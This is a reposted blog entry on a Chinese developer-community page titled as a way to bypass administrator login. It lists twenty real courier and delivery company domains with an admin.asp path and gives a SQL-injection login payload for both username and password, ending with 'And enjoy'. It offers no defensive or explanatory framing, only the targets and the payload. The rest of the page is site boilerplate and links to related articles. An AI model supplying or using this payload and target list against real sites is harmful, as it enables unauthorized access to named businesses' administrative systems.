备案控制台
探索云世界
开发者社区 云计算 文章 正文

绕过管理员验证登陆!

2017-11-08 1030
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:
 site:
# 1-packageexpress.net/entrack/admin.asp
# 2-mecourier.com/entrack/admin.asp
# 3-cannondelivery.com/entrack/admin.asp
# 4-cannondelivery.com/entrack/admin.asp
# 5-barefootmailmoms.com/entrack/admin.asp
# 6-rudysrush.com/entrack/admin.asp
# 7-sunrisedeliverykc.com/entrack/admin.asp
# 8-rfmcourier.com/entrack/admin.asp
# 9-dixiefreight.com/entrack/admin.asp
# 10-atlasdelivery.com/entrack/admin.asp
# 11-atlantadash.com/entrack/admin.asp
# 12-directlogisticstransport.com/entrack/admin.asp
# 13-cityexpressinc.com/entrack/admin.asp
# 14-redlinecourier.com/entrack/admin.asp
# 15-callcouriernow.com/entrack/admin.asp
# 16-korucutech.com/entrack/admin.asp
# 17-efficientdeliveryservice.com/entrack/admin.asp
# 18-actfastdelivery.com/entrack/admin.asp
# 19-cannondelivery.com/entrack/admin.asp
# 20-otwcourier.com/entrack/admin.asp
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
There are lots of sites

How exploitation

Exploit
http://server/[path]/admin.asp

User name : 'or''='
Password :  'or''='

And enjoy



本文转自enables 51CTO博客,原文链接:http://blog.51cto.com/niuzu/590856,如需转载请自行联系原作者


科技小先锋
目录
相关文章
唐城子
|
Oracle 关系型数据库 数据安全/隐私保护
【已解决】身份验证错误,要求的函数不正确或登录windows2008服务器提示账号密码错误的解决方案
【已解决】身份验证错误,要求的函数不正确或登录windows2008服务器提示账号密码错误的解决方案
唐城子
513 0
游客az7yd3cqma4aw
|
安全 数据安全/隐私保护
靶机实战-密码重置与身份认证失效漏洞
靶机实战-密码重置与身份认证失效漏洞
游客az7yd3cqma4aw
194 0
靶机实战-密码重置与身份认证失效漏洞
拉格朗日(Lagrange)
验证登陆案例
验证登陆案例
拉格朗日(Lagrange)
83 0
richard1230
|
数据安全/隐私保护
密码重置测试小结
前言 实现密码重置功能的常见方法: 发送带有唯一 URL 的电子邮件以重置密码 2.使用临时密码或当前密码发送的电子邮件 3.询问私密问题,然后提供重置密码的选项 4.使用 OTP(一次性密码)或多因素身份验证
richard1230
104 0
密码重置测试小结
运维朱工
|
存储 监控 安全
zabbix最新漏洞,可绕过认证登陆!
Zabbix对客户端提交的`Cookie`会话存在不安全的存储方式,导致在启动`SAML SSO`认证模式的前提下,恶意用户可通过构造特殊请求绕过认证,获取管理员权限,进而可实现`RCE`。
运维朱工
588 0
zabbix最新漏洞,可绕过认证登陆!
金色海洋
[导入]用户登录及验证用户是否登录的代码
用户登录及验证用户是否登录的代码文章来源:http://blog.csdn.net/jyk/archive/2006/08/15/1067382.aspx
金色海洋
674 0
玄学酱
|
网络虚拟化 数据安全/隐私保护
3.6. 用户验证
玄学酱
1187 0
玄学酱
|
网络虚拟化 数据安全/隐私保护
22.6. 用户验证
玄学酱
1150 0
技术小阿哥
|
Windows 运维
使用PSExec与本地管理员提示访问被拒绝
技术小阿哥
2040 0
老朱教授
|
.NET Windows 开发框架
模拟IE登录一个需要(windows身份)验证的网站
老朱教授
1236 0

热门文章

最新文章

  • 1
    理解事务的4种隔离级别
  • 2
    疑犯追踪第一季/全集Person Of Interest迅雷下载
  • 3
    简单实用的数据建模工具PDManer
  • 4
    详细讲解!Canal+Kafka实现MySQL与Redis数据同步!
  • 5
    71.7. Script for automatic startup on boot
  • 6
    关于Oracle客户端显示乱码问题
  • 7
    PHPWAMP站点管理的“域名模式”和“端口模式”详解、均支持自定义
  • 8
    jsHelper
  • 9
    学校里学不到的东西(一)
  • 10
    Python 3 教程一:入门
  • 1
    Python的装饰器
    34
  • 2
    R语言用潜类别混合效应模型(Latent Class Mixed Model ,LCMM)分析老年痴呆年龄数据
    20
  • 3
    数据分享|R语言用logistic逻辑回归和AFRIMA、ARIMA时间序列模型预测世界人口
    16
  • 4
    【视频】马尔可夫链蒙特卡罗方法MCMC原理与R语言实现|数据分享(下)
    21
  • 5
    【视频】马尔可夫链蒙特卡罗方法MCMC原理与R语言实现|数据分享(上)
    27
  • 6
    数据分享|数据探索电商平台用户行为流失可视化分析
    29
  • 7
    电商平台数据可视化分析网红零食销量
    18
  • 8
    R语言线性回归模型拟合诊断异常值分析家庭燃气消耗量和卡路里实例带自测题
    16
  • 9
    数据分享|R语言GLM广义线性模型:逻辑回归、泊松回归拟合小鼠临床试验数据(剂量和反应)示例和自测题
    12
  • 10
    数据分享|R语言逻辑回归、线性判别分析LDA、GAM、MARS、KNN、QDA、决策树、随机森林、SVM分类葡萄酒交叉验证ROC(下)
    17

    • 相关电子书

    更多
  • 安全机制与User账户身份验证实战
  • 从身份开始的零信任基础
  • 低代码开发师(初级)实战教程
    • 下一篇
    部署LAMP环境(Alibaba Cloud Linux 3)